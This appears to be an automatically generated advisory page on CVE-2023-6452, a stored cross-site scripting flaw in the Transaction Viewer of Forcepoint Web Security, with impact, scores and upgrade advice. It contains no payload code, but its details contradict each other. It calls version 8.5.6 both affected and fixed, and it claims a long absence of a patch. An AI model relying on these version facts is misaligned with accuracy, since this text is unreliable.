Platform
other
Component
forcepoint-web-security
Fixed in
8.5.6
CVE-2023-6452 is a critical Cross-Site Scripting (XSS) vulnerability affecting Forcepoint Web Security's Transaction Viewer. This vulnerability allows attackers to inject malicious scripts, potentially compromising administrator accounts and sensitive data. It impacts versions 0 through 8.5.6, and a fix is available in version 8.5.6.
The vulnerability resides in the 'user agent' field within the Transaction Viewer, a component used by administrators to analyze user requests. An attacker who can route traffic through the Forcepoint Web proxy can exploit this flaw to inject arbitrary JavaScript code. Successful exploitation could lead to session hijacking, defacement of the administrative interface, or even unauthorized access to backend systems. The impact is particularly severe as it targets administrators, granting a high level of access and control within the organization’s network. This stored XSS vulnerability is persistent, meaning the injected script will remain active until removed, potentially affecting multiple users and sessions.
CVE-2023-6452 was publicly disclosed on August 22, 2024. The vulnerability's ease of exploitation, combined with its critical severity, makes it a potential target for automated scanning and exploitation campaigns. While no active exploitation has been publicly confirmed, the lack of a patch for an extended period increases the risk. No KEV listing is currently available.
Exploit Status
EPSS
0.18% (39% percentile)
CISA SSVC
CVSS Vector
The primary mitigation for CVE-2023-6452 is to immediately upgrade Forcepoint Web Security to version 8.5.6 or later. If upgrading is not immediately feasible, consider implementing temporary workarounds such as strict input validation on the 'user agent' field, although this may impact legitimate user agent strings. Web Application Firewalls (WAFs) configured to detect and block XSS payloads can provide an additional layer of defense. Regularly review and sanitize user input to prevent future XSS vulnerabilities. After upgrade, confirm by attempting to inject a simple JavaScript payload into the user agent field and verifying that it is not executed.
Update Forcepoint Web Security to version 8.5.6 or later. This update corrects the stored XSS vulnerability in the Transaction Viewer. Refer to the Forcepoint article for detailed instructions on how to perform the update.
Vulnerability analysis and critical alerts directly to your inbox.
CVE-2023-6452 is a CRITICAL XSS vulnerability in Forcepoint Web Security's Transaction Viewer, allowing attackers to inject malicious scripts via the user agent field.
Yes, if you are using Forcepoint Web Security versions 0 through 8.5.6, you are potentially affected by this vulnerability.
Upgrade Forcepoint Web Security to version 8.5.6 or later to resolve the vulnerability. Consider WAF rules as a temporary mitigation.
While no active exploitation has been publicly confirmed, the vulnerability's severity and ease of exploitation suggest a potential risk.
Refer to the official Forcepoint security advisory for detailed information and updates: [https://www.forcepoint.com/security-advisories](https://www.forcepoint.com/security-advisories)
Upload your dependency file and we'll tell you instantly if this and other CVEs hit you.